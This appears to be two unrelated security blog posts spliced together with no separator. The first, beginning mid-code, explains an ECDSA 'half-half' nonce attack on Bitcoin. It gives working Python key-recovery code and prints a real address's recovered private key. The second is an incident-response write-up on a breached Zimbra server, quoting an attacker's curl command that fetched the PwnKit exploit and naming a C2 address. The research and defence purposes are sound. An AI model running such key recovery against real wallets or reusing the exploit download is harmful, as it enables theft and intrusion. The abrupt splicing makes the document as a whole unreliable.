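    lam = (3 * P[0] * P[0] * pow(2 * P[1], -1, p) if P == Q
           else (Q[1] - P[1]) * pow(Q[0] - P[0], -1, p)) % p
    x = (lam * lam - P[0] - Q[0]) % p
    return (x, (lam * (P[0] - x) - P[1]) % p)

def ec_mul(k, P):
    R = None
    while k:
        if k & 1: R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

def sign(d, h, k):
    r = ec_mul(k, G)[0] % n
    return r, pow(k, -1, n) * (h + r * d) % n

msb = lambda x: x >> 128                 # top 128 bits of a 256-bit value

d = int.from_bytes(hashlib.sha256(b"hypothetical wallet key").digest(), "big") % n
h1 = int.from_bytes(hashlib.sha256(b"tx one").digest(), "big")
h2 = int.from_bytes(hashlib.sha256(b"tx two").digest(), "big")

# Half-half nonces: upper half of the hash || upper half of the private key
k1 = msb(h1) * 2**128 + msb(d)
k2 = msb(h2) * 2**128 + msb(d)
r1, s1 = sign(d, h1, k1)
r2, s2 = sign(d, h2, k2)

# k1 - k2 = (msb(h1) - msb(h2)) * 2^128 is fully known, and each nonce also
# satisfies k_i = s_i^-1 * (h_i + r_i*d) mod n, so d falls out of one
# linear equation:
u1, u2 = pow(s1, -1, n), pow(s2, -1, n)
delta = (msb(h1) - msb(h2)) * 2**128 % n
d_rec = (delta - u1 * h1 + u2 * h2) * pow(u1 * r1 - u2 * r2, -1, n) % n
assert d_rec == d
```

The whole recovery is a handful of modular operations, which is why this variant runs in minutes over millions of keys where the lattice approach needs CPU-years.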
Since the nonce difference in our equation depends only on MSB128(h1) and MSB128(h2), it allows us to recover all the nonces which were generated with the formula

k = MSB128(h) * 2^128 + c

where c is a (secret) constant. This is a bit more generic, but a slight complication arises for Bitcoin. From an ECDSA signature (r, s), the different signature (r, -s mod n) is also valid for the same message and corresponds to the nonce -k. As Bitcoin rejects the signature with the larger s value to avoid signature malleability, we have to compute with both s and n - s. Thus, in our attack, we have to guess the sign of each nonce.
This construction could also have been discovered by the previous lattice attacks on shared suffixes, but only with a 75% chance of success.
We have run the analysis on the Bitcoin blockchain dump used in our previous analysis (up to block 752759 on September 5, 2022). We analyzed 34 million public keys with at least 2 signatures each. It took 10m23s on a 16-core AMD machine clocked at 2.7 GHz.
We were able to find and recover 110 unique private keys. For example, the transactions f3151fc1b29c117f1e4b67045b2d2901e7c289f596c242d7de123243fb623981 and f7bf1edf9d9cefa8421322c53bb00ecf118f99489171da72a9c11cf8d02b65f8 from the address 18zg6FG5pu8Bpq73L54AYvB8phTw3qCCR7 use the half-half method to generate nonces. Our script was able to recover the private key of that address:
0x3d6a2f408fe58dabce126718a06a655a4b49625572ab2eb1e9b6e094f11e1832
If we then recompute the nonces for such transactions we obtain:
0xf11a1456d7b0d9d13671f348928a84263d6a2f408fe58dabce126718a06a655a
0x49847dd298858c4ec1c059c11b22b3443d6a2f408fe58dabce126718a06a655a
We clearly see that the least significant half of each nonce is equal to the most significant half of the private key. However, as explained above, we are able to recover other interesting cases as well; for the same address we found two nonces:
0x28c0a0b7399997a379ba83642e210a837d44ada61f63128ff1bff7742fcbdbe7
0x69ee6c0c3f1f477df4ff8b9f272809247d44ada61f63128ff1bff7742fcbdbe7
In this case the private key is not involved; we rather find another unknown constant. We were also able to confirm the previous findings that some of the keys using such nonces were small keys, i.e., private keys with a very small numeric value. Such keys are easily recovered by bruteforcing, similarly to what has been done on the website https://privatekeys.pw. As with the previous attack, we did not find accounts with a non-zero balance, and we think that those accounts are monitored by bots and are emptied each time the balance changes.
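As a quick sanity check, plain Python confirms the structure of the four nonces listed above: the first pair embeds the top half of the recovered private key in its bottom half, while the second pair shares a different, unrelated constant:

```python
# Values copied from the recovered key and nonces shown above
d  = 0x3d6a2f408fe58dabce126718a06a655a4b49625572ab2eb1e9b6e094f11e1832
k1 = 0xf11a1456d7b0d9d13671f348928a84263d6a2f408fe58dabce126718a06a655a
k2 = 0x49847dd298858c4ec1c059c11b22b3443d6a2f408fe58dabce126718a06a655a
# Second pair, sharing an unknown constant instead of the key's upper half
k3 = 0x28c0a0b7399997a379ba83642e210a837d44ada61f63128ff1bff7742fcbdbe7
k4 = 0x69ee6c0c3f1f477df4ff8b9f272809247d44ada61f63128ff1bff7742fcbdbe7

mask = (1 << 128) - 1                               # least significant 128 bits
assert (k1 & mask) == (k2 & mask) == (d >> 128)     # half-half: MSB of the key
assert (k3 & mask) == (k4 & mask) != (d >> 128)     # some other shared constant
```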
Since this attack is quite fast, we have also run it on variations of the half-half nonce generation (for instance, swapping which halves of the message hash and of the private key are combined), but we did not find additional results.
We have also run the same attack on the Ethereum data set that we gathered during previous attacks. The attack took 49m11s on the same machine. No private keys were recovered with this attack.
It is interesting to see how creative nonce-generation constructions have been in the past, and we wonder if any other exotic constructions exist in the wild. Even though these new attacks did not recover new private keys, it does not mean that no other weak nonce-generation algorithms were used in past transactions; such keys could still be recovered by similar methods. If such a problem is discovered, the best way to protect the funds is to transfer them to a fresh address that was never used in a transaction before, leaving the vulnerable address empty. The script of our attack and the results we obtained are available in the GitHub repository of the Polynonce attack.
Special thanks to my colleagues Marco Macchetti and Nils Amiet, for the original attack, ideas and for contributing to this blog post with fruitful discussions.
In this series, we will be covering recent incident response cases handled by the Kudelski Security Incident Response team (KSIR).
This is not an in-depth technical write up, rather an effort to share concrete recommendations from a specific incident, which will help you improve your readiness in case of a cyber breach.


KSIR was contacted after the client suspected “something didn’t look right” with their Zimbra webmail server in the demilitarized zone (DMZ), which they had been investigating for almost a month.
A quick check revealed the following:

The first action we took was to deploy the EDR agents on the Linux servers. This would give us the visibility and ability to be ready to respond in case the attacker was still in the network or if any super-advanced persistence mechanism had been set.

Two days later, while we were working on agent deployment, the threat actor did indeed return, and we received an alert on the Zimbra server. Throughout the investigation, the threat actor appeared to work on a schedule: every 4-5 days, during “working hours” between midnight and 5 AM UTC+1.
While we suspected that the exposed internet assets were the entry points of attackers, we were able to prove it by piecing the evidence together on a timeline.
After appearing to search for webshells, the attacker received a status code 200 on one of the deployed Java pages, /opt/zimbra/jetty_base/webapps/zimbra/public/jsp/Startup3.jsp (see Figure 1), and started interacting with it by executing some enumeration commands (see Figure 2, checking who is logged on and what they are doing).


The threat actor later checked if any of the other webshells were still present. This gave us a clue as to where the attacker would store the backdoors. The first two commands (shown in Figure 3 below) even showed how the attacker would obfuscate them with different base64 encoding libraries.

After getting hits, the threat actor tampered with the timestamp metadata of the files to hide them more effectively, making them look like they were present at a previous point in time and would go unnoticed if the administrator looked for recent modifications (Figure 4).

Further custom forensics on the host revealed other webshells:
/opt/zimbra/jetty_base/webapps/zimbra/public/jsp/Zimbre.jsp
As the webserver logs don’t go back far enough, proving which CVE was exploited to gain a foothold on the Zimbra webserver was not straightforward. However, a quick search on the product’s vulnerabilities showed that different Zimbra RCE vulnerabilities had been actively exploited in the wild, especially against server versions that were confirmed to be outdated at the time. See: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a for details.

Around the time we received the EDR alert for the Zimbra webserver, we got another alert from an internal webserver that indicated a compromised user was attempting to download the following:
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
This is a self-contained exploit for CVE-2021-4034 for local privilege escalation on Linux distributions. We confirmed that the client’s infrastructure was vulnerable.
In order to determine the scope of lateral movement, we started pulling artifacts with sniper forensics on the local webserver, as EDR technology is only effective from the moment it is deployed and is not useful for investigating past activity.

Following the two alerts, we moved to containment.
At this stage, we had reliable information about the attacker from the two alerts: timeframe, username, and exploitation habits. As the attacker was seen to leverage CVE-2021-4034 whenever they started an SSH session, one way to hunt for this behavior is to look for the lines below in the auth.log (secure.log) file (Figure 5); these correlate positively with exploitation using that kit.

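This kind of correlation hunt can be sketched as a simple scan over the log. The sample lines below are illustrative, not the exact entries from Figure 5; in practice the same hunt is a grep over /var/log/auth.log (or /var/log/secure on RHEL-family systems):

```python
# Sketch: correlate SSH logins with pkexec activity (PwnKit abuses pkexec).
import re

# Illustrative sample; a real hunt reads /var/log/auth.log instead.
sample_log = """\
Jul 14 02:13:05 web01 sshd[8812]: Accepted password for contractor from 10.0.5.2 port 55012 ssh2
Jul 14 02:13:09 web01 pkexec[8830]: contractor: Error executing command as another user: Not authorized
"""

lines = sample_log.splitlines()
ssh_logins = [l for l in lines if re.search(r"sshd\[\d+\]: Accepted", l)]
pkexec_hits = [l for l in lines if "pkexec" in l]
```

Flagging hosts where pkexec events cluster right after an SSH login from the suspect account is exactly the iterative filter we applied across the fleet.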
This iterative process allowed us to discover that the threat actor was coming from a contractor VNC gateway and leveraging credentials (which we later discovered to be compromised) to try to log into as many hosts as they could, successfully getting into 6 others.
Furthermore, the forensic analysis revealed that a backdoor binary was dropped onto two servers.
The backdoor is successfully detected by many AV engines and is labeled as trojan.linux/rekoobe (figure 6).


Static analysis of the file shows a hardcoded C2 ip: 94.158.247.102 and a connection would be established on port 443 (Figure 7).


While it is theoretically possible that two different threat actors were on the same environment, we wanted to understand how the attacker could move from the mail server to the other hosts.
We confirmed the hypothesis that the compromised user’s cleartext password was sent in an email stored in cleartext on the Zimbra webmail server. Essentially, the client needed to assume that the attacker had access to other sensitive data residing in the emails.
Moving on with the investigation, we were able to determine that the account belonged to an ex-employee of the contracting company who was not properly offboarded.
Their account’s most recent activity occurred during the incident’s timeline. This allowed us to confidently establish the link between Zimbra as patient-0 and the contractor’s VNC gateway as the first host in the lateral movement kill chain.
So, taking a step back for a minute, this is where we’re at:
We understand that the webserver is vulnerable to critical CVEs and that one of them was most likely exploited. While the recommended remediation is to patch the application by updating it, there is insufficient bandwidth on the client’s side to perform such an action. Furthermore, there is no tolerance for business disruption, hence isolating the host is out of the question.
For this reason, after cleaning up any identified persistence, we suggest temporary mitigations to enable the client to keep the service running. Recommendations are as follows:
We also make it clear that – should something unexpected happen – our Managed Detection and Response and IR services are on hand, 24/7 to help get them out of the situation.
It’s worth pointing out that the client was grateful that we built our investigation around their business needs. Our approach is never cookie-cutter. We always take into account their practical restrictions and operational requirements before building a response.

The compromised Zimbra server was contained and reserved for investigation while the customer worked on starting a fresh image. Unfortunately, the new server was spawned from a compromised snapshot, which allowed the attacker to find a hidden webshell backdoor. This time the attacker directly deleted all user accounts. We believe the act of sabotage was precipitated by the operation being burned.

Fortunately, the client had recent backups. Disruption for users was minor (less than 1 hour of downtime) and login was only blocked temporarily before restoration.
—
In addition to common tactics, techniques, and procedures, the breach in question included more specific ones:
– Initial foothold on a DMZ webserver (MITRE T1190)
– Lateral movement with insecure credentials (MITRE T1552.001)
– Leveraging third-party trust (MITRE T1199)
– Exploitation for privilege escalation (MITRE T1068)
– Web shell backdoors (MITRE T1505.003)
– Lateral movement with SSH (MITRE T1021.004)
– Timestomping (MITRE T1070.006)
Click here to download the full case study, including the 8 key takeaways.